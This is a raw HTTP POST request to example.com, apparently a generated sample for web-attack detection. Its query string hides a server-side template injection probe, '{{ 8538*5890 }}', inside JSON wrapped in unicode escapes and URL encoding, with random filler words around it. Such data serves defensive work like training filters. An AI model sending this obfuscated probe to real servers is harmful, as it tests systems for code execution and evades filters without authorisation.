POST /mechanism/vulnerability/respective/customized?access=score&sustainable=substantial&efficiency=%7B%20%20%22%5Cu0064%5Cu0075%5Cu006D%5Cu0070%22%09%3A%7B%0A%0D%22%5Cu0063%5Cu0061%5Cu0072%5Cu0065%5Cu0074%22%0A%3A%0A%09%5B%0A%7B%0A%0D%22%5Cu0073%5Cu006E%5Cu0061%5Cu0070%5Cu0073%5Cu0068%5Cu006f%5Cu0074%22%09%0A%3A%0952%20%7D%0D%2C%20false%09%0D%5D%2C%09%22%5Cu0063%5Cu0061%5Cu0074%5Cu0061%5Cu0073%5Cu0074%5Cu0072%5Cu006f%5Cu0070%5Cu0068%5Cu0069%5Cu0063%5Cu0020%5Cu0066%5Cu0061%5Cu0069%5Cu006C%5Cu006F%5Cu0076%5Cu0065%5Cu0072%22%09%0D%3A%0A%7B%09%20%09%22%5Cu0072%5Cu0061%5Cu0074%5Cu0069%5Cu0066%5Cu0079%22%3A%20%22%5Cu0064%5Cu0061%5Cu0074%5Cu0061%5Cu0062%5Cu0061%5Cu0073%5Cu0065%22%0A%0D%7D%09%09%7D%0A%2C%20%22%5Cu0072%5Cu0061%5Cu0074%5Cu0069%5Cu0066%5Cu0079%22%0D%3Atrue%2C%09%22%5Cu0069%5Cu006d%5Cu0070%5Cu006C%5Cu0065%5Cu006D%5Cu0065%5Cu006E%5Cu0074%22%09%20%3A%09%22%5Cu007B%5Cu007b%5Cu0020%5Cu0038%5Cu0035%5Cu0033%5Cu0038%5Cu002A%5Cu0035%5Cu0038%5Cu0039%5Cu0030%5Cu0020%5Cu007D%5Cu007d%22%09%0D%0A%7D HTTP/1.1
Host: example.com
Cache-Control: no-cache
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Cookie: reconcile=protocol; seamless=constant; SESSIONID=a9a47994a91e5dcf0ba0c7d403b7005ac09461ff771897a9cda08dc2b291a46ba9f5600f40f311d42bbf8a9d435f5864

